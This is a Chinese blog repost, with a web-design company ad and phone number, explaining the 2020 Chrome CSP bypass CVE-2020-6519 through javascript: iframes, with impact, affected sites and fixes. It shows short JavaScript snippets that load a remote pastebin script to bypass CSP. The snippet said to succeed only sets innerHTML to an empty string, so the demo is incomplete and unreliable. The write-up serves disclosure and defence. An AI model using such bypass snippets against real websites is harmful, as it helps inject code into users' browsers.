本篇文章給大家分享的是有關(guān)Chrome瀏覽器的CSP策略是怎樣繞過(guò)漏洞，小編覺(jué)得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

創(chuàng)新互聯(lián)建站主要從事成都網(wǎng)站設(shè)計(jì)、做網(wǎng)站、網(wǎng)頁(yè)設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)皇姑,十余年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專業(yè),歡迎來(lái)電咨詢建站服務(wù):18980820575

下面講述了原作者發(fā)現(xiàn)谷歌瀏覽器Chrome的CSP（內(nèi)容安全策略）完全繞過(guò)漏洞（CVE-2020-6519），影響2019年3月之后發(fā)布的所有版本Chrome瀏覽器，從而導(dǎo)致很多大公司網(wǎng)站的CSP策略在該漏洞面前會(huì)完全失效。該漏洞最終收獲谷歌獎(jiǎng)勵(lì)$3000。

CSP策略完全繞過(guò)的悲劇

非常震驚的是，我發(fā)現(xiàn)該漏洞存在基于Chromium內(nèi)核的Chrome、Opera和Edge系列瀏覽器，且影響Windows、Mac和Android平臺(tái)，攻擊者可以利用該漏洞，繞過(guò)自2019年3月起至2020年7月的所有Chrome內(nèi)置CSP策略。

該漏洞的嚴(yán)重性在于，由于Chrome瀏覽器有超過(guò)20億的用戶，占據(jù)超過(guò)65%的瀏覽器市場(chǎng)，因此該漏洞潛在的受影響用戶會(huì)達(dá)數(shù)十億。

另外，很多大公司網(wǎng)站都存在該漏洞。如Facebook,WellsFargo, Gmail , Zoom, Tiktok, Instagram, WhatsApp, Investopedia, ESPN, Roblox, Indeed, Blogger, Quora等。

用簡(jiǎn)單方法完全突破Chrome的CSP策略限制

大家感興趣的話，可以點(diǎn)此參考研究谷歌公開(kāi)的POC驗(yàn)證文件，但漏洞原因總結(jié)來(lái)說(shuō)就是：

通常情況下，在設(shè)置了CSP策略的Chrome瀏覽器中，如果要執(zhí)行以下JS腳本，由于CSP策略不允許腳本中的源或操作執(zhí)行，所以會(huì)在瀏覽端實(shí)現(xiàn)阻攔。（pastebin鏈接中是一段腳本）：

/* this is a script that pops an alert message */
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';

/* this call will fail due to CSP */
var s = document.createElement("script"); s.src = top._CVE_URL; document.body.appendChild(s);

但是，如果用javascript: src的iframe方式來(lái)運(yùn)行上述JS腳本，則可以完全突破Chrome瀏覽器的CSP策略限制，成功實(shí)現(xiàn)腳本運(yùn)行：

/* this is a script that pops an alert message */
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';

/* this call will succeed although CSP */
document.querySelector('DIV').innerHTML="";

就這樣簡(jiǎn)單粗暴！致使任意操作系統(tǒng)中的數(shù)十億客戶端瀏覽器就受到了影響，攻擊者可以通過(guò)此種方式在其客戶端中執(zhí)行CSP提權(quán)，進(jìn)而實(shí)現(xiàn)惡意代碼執(zhí)行。

這里要說(shuō)明的是，有一些配置了CSP策略的網(wǎng)站并不受該漏洞影響，如Twitter, Github, LinkedIn, Google Play Store, Yahoo's Login Page, PayPal 和 Yandex，這些網(wǎng)站在客戶端配置中應(yīng)用了服務(wù)端形式的nonce 或 hash校驗(yàn)方式，因此其相對(duì)安全，不受影響。

漏洞影響

CSP，內(nèi)容安全策略，即網(wǎng)站一種訪問(wèn)策略和規(guī)則，它告訴客戶端哪些外部資源是可以在網(wǎng)站中加載執(zhí)行 ，客戶端以此為遵循，對(duì)網(wǎng)站發(fā)起訪問(wèn)。

在CSP策略規(guī)則下，網(wǎng)站可以針對(duì)客戶端瀏覽器的JS代碼等請(qǐng)求，執(zhí)行允許/阻攔操作，避免客戶端用戶遭受XSS等攻擊影響，以此形成安全屏障。

這里要明確的是，由于攻擊者利用該漏洞，還需構(gòu)建請(qǐng)求訪問(wèn)網(wǎng)站的惡意腳本，所以Chrome瀏覽器里的這個(gè)CSP策略繞過(guò)漏洞，并不能直接就影響到網(wǎng)站，這也是該漏洞被評(píng)級(jí)為中危的原因。

該漏洞的基本情況是，Chrome瀏覽器的這種CSP策略繞過(guò)缺陷，導(dǎo)致很多網(wǎng)站自身的CSP策略規(guī)則失效。這里分兩種情況，第一，有些網(wǎng)站配置了嚴(yán)格的CSP策略，像上述的Twitter，該漏洞不能讓其策略失效；第二，有些網(wǎng)站配置了一般的CSP策略，該漏洞可以讓其CSP策略完全失效。

除以上提到的網(wǎng)站外，基于此漏洞情況，可以保守估計(jì)，包括電子商務(wù)、銀行、電信、政府和公用事業(yè)在內(nèi)的數(shù)以千計(jì)的行業(yè)網(wǎng)站都會(huì)受影響，攻擊者可以利用該漏洞，向這些網(wǎng)站的客戶端用戶注入惡意代碼。

可能有人會(huì)說(shuō)，這種漏洞利用的前提是，攻擊者必須在網(wǎng)站上獲得代碼執(zhí)行權(quán)限啊，這樣的CSP繞過(guò)漏洞沒(méi)啥意思嘛。但我不這樣認(rèn)為。

因?yàn)榇蠖鄶?shù)網(wǎng)站都依賴CSP策略來(lái)提供客戶端的安全防護(hù)，所以，這種漏洞的出現(xiàn)，對(duì)網(wǎng)站自身的安全運(yùn)行機(jī)制來(lái)說(shuō)，就是一個(gè)嚴(yán)重的風(fēng)險(xiǎn)隱患。

半年前，我發(fā)現(xiàn)了WhatsApp Web/Desktop應(yīng)用中的一個(gè)存儲(chǔ)型XSS漏洞，其中就大量描述了CSP繞過(guò)漏洞可以導(dǎo)致的危害，其CSP繞過(guò)漏洞的危險(xiǎn)之處在于，很多網(wǎng)站的不當(dāng)CSP策略配置，可讓攻擊者注入惡意腳本，實(shí)現(xiàn)與任意網(wǎng)站相關(guān)域名的通信。

也正因?yàn)槿绱耍诰W(wǎng)站中發(fā)現(xiàn)一個(gè)管理者不可控的代碼執(zhí)行漏洞非常之難，但是，這種漏洞如果一旦存在，就可能會(huì)對(duì)網(wǎng)站本身生成致命威脅。

漏洞測(cè)試

我自己編寫(xiě)了一個(gè)測(cè)試腳本，然后利用Chrome的開(kāi)發(fā)者工具，就能簡(jiǎn)單測(cè)試出哪些網(wǎng)站受該漏洞影響。測(cè)試中調(diào)用的外部JS腳本鏈接為https://pastebin.com/raw/XpHsfXJQ，它會(huì)觸發(fā)漏洞實(shí)現(xiàn)。

以下是Facebook網(wǎng)站存受該漏洞的影響情況：

以下是Github網(wǎng)站存受該漏洞的影響情況：

不受該漏洞的影響情況：

修復(fù)建議

對(duì)網(wǎng)站運(yùn)營(yíng)方來(lái)說(shuō)，首先要確保網(wǎng)站有嚴(yán)格的CSP策略規(guī)則，其次就是可以考慮向其中加入一些服務(wù)端的nonce或hash校驗(yàn)措施，或是JS腳本和惡意代碼注入檢測(cè)機(jī)制，各種安全策略的共同配置，才能保證網(wǎng)站安全。對(duì)用戶端來(lái)說(shuō)，就更新Chrome吧，更新到84版本或更高版本。

漏洞補(bǔ)丁

谷歌的Chromium項(xiàng)目團(tuán)隊(duì)已及時(shí)修復(fù)了該漏洞，并在Chrome 84后進(jìn)行了補(bǔ)丁更新，漏洞最終被評(píng)級(jí)為中危(CVSS 6.5)，作者收獲了$3,000的獎(jiǎng)勵(lì)。

以上就是Chrome瀏覽器的CSP策略是怎樣繞過(guò)漏洞，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。